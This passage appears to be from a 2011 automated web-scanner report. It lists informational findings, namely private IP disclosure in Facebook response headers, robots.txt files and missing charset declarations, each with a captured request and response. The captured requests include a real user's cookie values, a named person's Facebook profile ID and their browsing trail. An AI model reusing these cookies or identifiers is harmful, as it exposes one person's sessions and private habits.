GET /plugins/like.php?action=recommend&api_key=64b385429f05b2492d713f343d05ba02&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df290929f24%26origin%3Dhttp%253A%252F%252Fmoney.cnn.com%252Ff3d8dc2804%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fmoney.cnn.com%2F2011%2F08%2F15%2Fmarkets%2Fmarkets_newyork%2Findex.htm&layout=standard&locale=en_US&node_type=link&ref=fbLike&sdk=joey&show_faces=false&width=450 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dstowetoday.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.stowetoday.com%252Fstowe_reporter%252Fnews%252Flocal_news%252Farticle_0a3aa2c8-b923-11e0-b623-001cc4c03286.html%26extra_2%3DUS; lsd=yxUAz; datr=pG8pTrLcOF5vWXJLyEMRGq7p; reg_ext_ref=http%3A%2F%2Fia.media-imdb.com%2Fimages%2FM%2FMV5BMjAyMzczODYxNV5BMl5Bc3dmXkFtZTcwMTM1ODkxNg%40%40._V1_.swf; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; act=1313433616787%2F1; reg_fb_ref=http%3A%2F%2Fpt-br.facebook.com%2Fpeople%2FAndr%25C3%25A9-Azevedo%2F1668500662; wd=1123x918

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.70.53
X-Cnection: close
Date: Mon, 15 Aug 2011 18:46:39 GMT
Content-Length: 7833

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title>
<link type="text/css" rel="stylesheet" href="http
...[SNIP]...

16.73. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fcnnmoney&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=27 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dstowetoday.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.stowetoday.com%252Fstowe_reporter%252Fnews%252Flocal_news%252Farticle_0a3aa2c8-b923-11e0-b623-001cc4c03286.html%26extra_2%3DUS; lsd=yxUAz; datr=pG8pTrLcOF5vWXJLyEMRGq7p; reg_ext_ref=http%3A%2F%2Fia.media-imdb.com%2Fimages%2FM%2FMV5BMjAyMzczODYxNV5BMl5Bc3dmXkFtZTcwMTM1ODkxNg%40%40._V1_.swf; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; act=1313433616787%2F1; reg_fb_ref=http%3A%2F%2Fpt-br.facebook.com%2Fpeople%2FAndr%25C3%25A9-Azevedo%2F1668500662; wd=1123x918

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.209.30
X-Cnection: close
Date: Mon, 15 Aug 2011 18:46:04 GMT
Content-Length: 4147

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title>
<link type="text/css" rel="stylesheet" href="http
...[SNIP]...

16.74. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fcnnmoney&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=27 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://tech.fortune.cnn.com/2011/08/15/is-google-buying-motorola-for-its-17000-patents/?iid=EL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dstowetoday.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.stowetoday.com%252Fstowe_reporter%252Fnews%252Flocal_news%252Farticle_0a3aa2c8-b923-11e0-b623-001cc4c03286.html%26extra_2%3DUS; lsd=yxUAz; datr=pG8pTrLcOF5vWXJLyEMRGq7p; reg_ext_ref=http%3A%2F%2Fia.media-imdb.com%2Fimages%2FM%2FMV5BMjAyMzczODYxNV5BMl5Bc3dmXkFtZTcwMTM1ODkxNg%40%40._V1_.swf; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; act=1313433616787%2F1; reg_fb_ref=http%3A%2F%2Fpt-br.facebook.com%2Fpeople%2FAndr%25C3%25A9-Azevedo%2F1668500662; wd=1123x918

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.178.51
X-Cnection: close
Date: Mon, 15 Aug 2011 18:47:31 GMT
Content-Length: 4165

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title>
<link type="text/css" rel="stylesheet" href="http
...[SNIP]...

16.75. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?action=recommend&api_key=64b385429f05b2492d713f343d05ba02&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1669cfe08%26origin%3Dhttp%253A%252F%252Ftech.fortune.cnn.com%252Ff2e48d56d4%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Ftech.fortune.cnn.com%2F2011%2F08%2F15%2Fis-google-buying-motorola-for-its-17000-patents%2F&layout=standard&locale=en_US&node_type=link&ref=fbLike&sdk=joey&show_faces=false&width=450 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://tech.fortune.cnn.com/2011/08/15/is-google-buying-motorola-for-its-17000-patents/?iid=EL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dstowetoday.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.stowetoday.com%252Fstowe_reporter%252Fnews%252Flocal_news%252Farticle_0a3aa2c8-b923-11e0-b623-001cc4c03286.html%26extra_2%3DUS; lsd=yxUAz; datr=pG8pTrLcOF5vWXJLyEMRGq7p; reg_ext_ref=http%3A%2F%2Fia.media-imdb.com%2Fimages%2FM%2FMV5BMjAyMzczODYxNV5BMl5Bc3dmXkFtZTcwMTM1ODkxNg%40%40._V1_.swf; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; act=1313433616787%2F1; reg_fb_ref=http%3A%2F%2Fpt-br.facebook.com%2Fpeople%2FAndr%25C3%25A9-Azevedo%2F1668500662; wd=1123x918

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.179.42
X-Cnection: close
Date: Mon, 15 Aug 2011 18:47:48 GMT
Content-Length: 7944

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title>
<link type="text/css" rel="stylesheet" href="http
...[SNIP]...

16.76. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?action=recommend&api_key=64b385429f05b2492d713f343d05ba02&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df381c095dc%26origin%3Dhttp%253A%252F%252Ftech.fortune.cnn.com%252Ff2e48d56d4%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Ftech.fortune.cnn.com%2F2011%2F08%2F15%2Fis-google-buying-motorola-for-its-17000-patents%2F%3Fiid%3DEL&layout=standard&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=300 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://tech.fortune.cnn.com/2011/08/15/is-google-buying-motorola-for-its-17000-patents/?iid=EL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dstowetoday.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.stowetoday.com%252Fstowe_reporter%252Fnews%252Flocal_news%252Farticle_0a3aa2c8-b923-11e0-b623-001cc4c03286.html%26extra_2%3DUS; lsd=yxUAz; datr=pG8pTrLcOF5vWXJLyEMRGq7p; reg_ext_ref=http%3A%2F%2Fia.media-imdb.com%2Fimages%2FM%2FMV5BMjAyMzczODYxNV5BMl5Bc3dmXkFtZTcwMTM1ODkxNg%40%40._V1_.swf; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; act=1313433616787%2F1; reg_fb_ref=http%3A%2F%2Fpt-br.facebook.com%2Fpeople%2FAndr%25C3%25A9-Azevedo%2F1668500662; wd=1123x918

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.193.60
X-Cnection: close
Date: Mon, 15 Aug 2011 18:49:32 GMT
Content-Length: 6813

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title>
<link type="text/css" rel="stylesheet" href="http
...[SNIP]...

16.77. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?href=facebook.com%2Fimdb&width=300&connections=5&stream=false&header=false&height=190 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.imdb.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dstowetoday.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.stowetoday.com%252Fstowe_reporter%252Fnews%252Flocal_news%252Farticle_0a3aa2c8-b923-11e0-b623-001cc4c03286.html%26extra_2%3DUS; datr=pG8pTrLcOF5vWXJLyEMRGq7p

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.36.45
X-Cnection: close
Date: Mon, 15 Aug 2011 18:23:58 GMT
Content-Length: 11024

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...

16.78. http://www.facebook.com/profile.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /profile.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /profile.php?id=1668500662 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/media/set/?set=a.206519616063696.51681.146642365384755
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dstowetoday.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.stowetoday.com%252Fstowe_reporter%252Fnews%252Flocal_news%252Farticle_0a3aa2c8-b923-11e0-b623-001cc4c03286.html%26extra_2%3DUS; lsd=yxUAz; datr=pG8pTrLcOF5vWXJLyEMRGq7p; reg_ext_ref=http%3A%2F%2Fia.media-imdb.com%2Fimages%2FM%2FMV5BMjAyMzczODYxNV5BMl5Bc3dmXkFtZTcwMTM1ODkxNg%40%40._V1_.swf; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.206519616063696.51681.146642365384755; wd=1123x954; act=1313433616787%2F1; _e_mTli_0=%5B%22mTli%22%2C1313433616788%2C%22act%22%2C1313433616787%2C1%2C%22http%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D1668500662%22%2C%22click%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Fmedia%2Fset%2F%3Fset%3Da.206519616063696.51681.146642365384755%22%2C%7B%22ft%22%3A%7B%22type%22%3A35%7D%2C%22gt%22%3A%7B%7D%7D%2C134%2C877%2C63%2C981%2C16%5D; x-src=%2Fprofile.php%7Calbum_metadata_pagelet

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://pt-br.facebook.com/people/Andr..-Azevedo/1668500662
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: next=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: rdir=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: x-src=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.246.60
X-Cnection: close
Date: Mon, 15 Aug 2011 18:39:22 GMT
Content-Length: 0


16.79. http://www.facebook.com/widgets/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /widgets/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /widgets/like.php?width=280&show_faces=1&layout=standard&href=http%3A%2F%2Fwww.imdb.com%2Fshowtimes%2Ftitle%2Ftt1650062%2F HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.imdb.com/showtimes/title/tt1650062/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dstowetoday.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.stowetoday.com%252Fstowe_reporter%252Fnews%252Flocal_news%252Farticle_0a3aa2c8-b923-11e0-b623-001cc4c03286.html%26extra_2%3DUS; lsd=yxUAz; datr=pG8pTrLcOF5vWXJLyEMRGq7p; reg_ext_ref=http%3A%2F%2Fia.media-imdb.com%2Fimages%2FM%2FMV5BMjAyMzczODYxNV5BMl5Bc3dmXkFtZTcwMTM1ODkxNg%40%40._V1_.swf; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; act=1313433616787%2F1; reg_fb_ref=http%3A%2F%2Fpt-br.facebook.com%2Fpeople%2FAndr%25C3%25A9-Azevedo%2F1668500662; wd=1123x918

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.240.50
X-Cnection: close
Date: Mon, 15 Aug 2011 18:41:17 GMT
Content-Length: 5231

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title>
<link type="text/css" rel="stylesheet" href="http
...[SNIP]...

16.80. http://www.facebook.com/widgets/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /widgets/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /widgets/like.php?width=280&show_faces=1&layout=standard&href=http%3A%2F%2Fwww.imdb.com%2Fshowtimes%2F HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.imdb.com/showtimes/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dstowetoday.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.stowetoday.com%252Fstowe_reporter%252Fnews%252Flocal_news%252Farticle_0a3aa2c8-b923-11e0-b623-001cc4c03286.html%26extra_2%3DUS; lsd=yxUAz; datr=pG8pTrLcOF5vWXJLyEMRGq7p; reg_ext_ref=http%3A%2F%2Fia.media-imdb.com%2Fimages%2FM%2FMV5BMjAyMzczODYxNV5BMl5Bc3dmXkFtZTcwMTM1ODkxNg%40%40._V1_.swf; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FConanTheBarbarian%3Fsk%3Dapp_108503912579284; wd=1123x954

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.53.42
X-Cnection: close
Date: Mon, 15 Aug 2011 18:25:07 GMT
Content-Length: 5165

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title>
<link type="text/css" rel="stylesheet" href="http
...[SNIP]...

17. Robots.txt file  previous  next
There are 8 instances of this issue:

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.


17.1. http://api.recaptcha.net/challenge  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.recaptcha.net
Path:   /challenge

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: api.recaptcha.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Mon, 15 Aug 2011 19:01:40 GMT
Expires: Mon, 15 Aug 2011 19:01:40 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

User-agent: *
Disallow: /

17.2. http://at-img2.tdimg.com/sales/material/2011/0728/1311852230142.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://at-img2.tdimg.com
Path:   /sales/material/2011/0728/1311852230142.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: at-img2.tdimg.com

Response

HTTP/1.1 200 OK
Server: tws/0.1
Date: Mon, 15 Aug 2011 18:56:37 GMT
Content-Type: text/plain
Content-Length: 24
Last-Modified: Mon, 28 Sep 2009 06:30:42 GMT
Connection: close
Expires: Tue, 14 Aug 2012 18:56:37 GMT
Cache-Control: max-age=31536000
Accept-Ranges: bytes

User-agent: *
allow: /*

17.3. http://at-img3.tdimg.com/sales/material/2011/0729/1311932714659.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://at-img3.tdimg.com
Path:   /sales/material/2011/0729/1311932714659.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: at-img3.tdimg.com

Response

HTTP/1.1 200 OK
Server: tws/0.1
Date: Mon, 15 Aug 2011 18:56:29 GMT
Content-Type: text/plain
Content-Length: 24
Last-Modified: Mon, 28 Sep 2009 06:30:42 GMT
Connection: close
Expires: Tue, 14 Aug 2012 18:56:29 GMT
Cache-Control: max-age=31536000
Accept-Ranges: bytes

User-agent: *
allow: /*

17.4. http://at-img4.tdimg.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://at-img4.tdimg.com
Path:   /crossdomain.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: at-img4.tdimg.com

Response

HTTP/1.1 200 OK
Server: tws/0.1
Date: Mon, 15 Aug 2011 18:56:23 GMT
Content-Type: text/plain
Content-Length: 24
Last-Modified: Mon, 28 Sep 2009 06:30:42 GMT
Connection: close
Expires: Tue, 14 Aug 2012 18:56:23 GMT
Cache-Control: max-age=31536000
Accept-Ranges: bytes

User-agent: *
allow: /*

17.5. http://stat.tudou.com/newstat/pv  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stat.tudou.com
Path:   /newstat/pv

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: stat.tudou.com

Response

HTTP/1.1 200 OK
ETag: W/"32-1288195607000"
Cache-Control: no-cache
Age: 31042
Content-Length: 32
Date: Mon, 15 Aug 2011 10:19:15 GMT
Connection: keep-alive
X-Cache: HIT from stat.tudou.com
Last-Modified: Wed, 27 Oct 2010 16:06:47 GMT
Server: Apache
Content-Type: text/plain

User-agent: *
Disallow:/*beta=1*

17.6. http://toolbarqueries.clients.google.com/tbproxy/af/query  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://toolbarqueries.clients.google.com
Path:   /tbproxy/af/query

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: toolbarqueries.clients.google.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Thu, 11 Aug 2011 21:56:40 GMT
Date: Mon, 15 Aug 2011 19:02:02 GMT
Expires: Mon, 15 Aug 2011 19:02:02 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

17.7. http://www.xhamstercams.com/cam/Juicy_Jules19/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xhamstercams.com
Path:   /cam/Juicy_Jules19/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.xhamstercams.com

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:56:49 GMT
Server: Apache
Content-Length: 38
Last-Modified: Sat, 05 Feb 2011 00:52:06 GMT
Vary: Accept-Encoding
P3P: policyref="http://www.streamate.com/p3p/ns.xml", CP="NOI DSP COR CUR ADMa DEVa OUR IND UNI STA"
Connection: close
Content-Type: text/plain

user-agent: *
disallow: /myalerts.php

17.8. http://xhamster.com/signup.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://xhamster.com
Path:   /signup.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: xhamster.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.52
Date: Mon, 15 Aug 2011 18:56:31 GMT
Content-Type: text/plain
Connection: close
Vary: Accept-Encoding
Last-Modified: Mon, 11 Jul 2011 14:48:58 GMT
ETag: "375ad4-104-4a7cc487a8a80"
Accept-Ranges: bytes
Content-Length: 260
Vary: Accept-Encoding

User-agent: *
disallow: /send/
disallow: /photos/send/
disallow: /user/photo/
disallow: /user/video/
disallow: /search*q=*
disallow: /signup*next=*
disallow: /login*next=*
disallow: /photos/ajax*
disa
...[SNIP]...

18. HTML does not specify charset  previous  next
There are 86 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


18.1. http://a2.mediagra.com/b.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a2.mediagra.com
Path:   /b.php

Request

GET /b.php?s=13 HTTP/1.1
Host: a2.mediagra.com
Proxy-Connection: keep-alive
Referer: http://xhamster.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.3.2
X-Powered-By: PHP/5.3.2
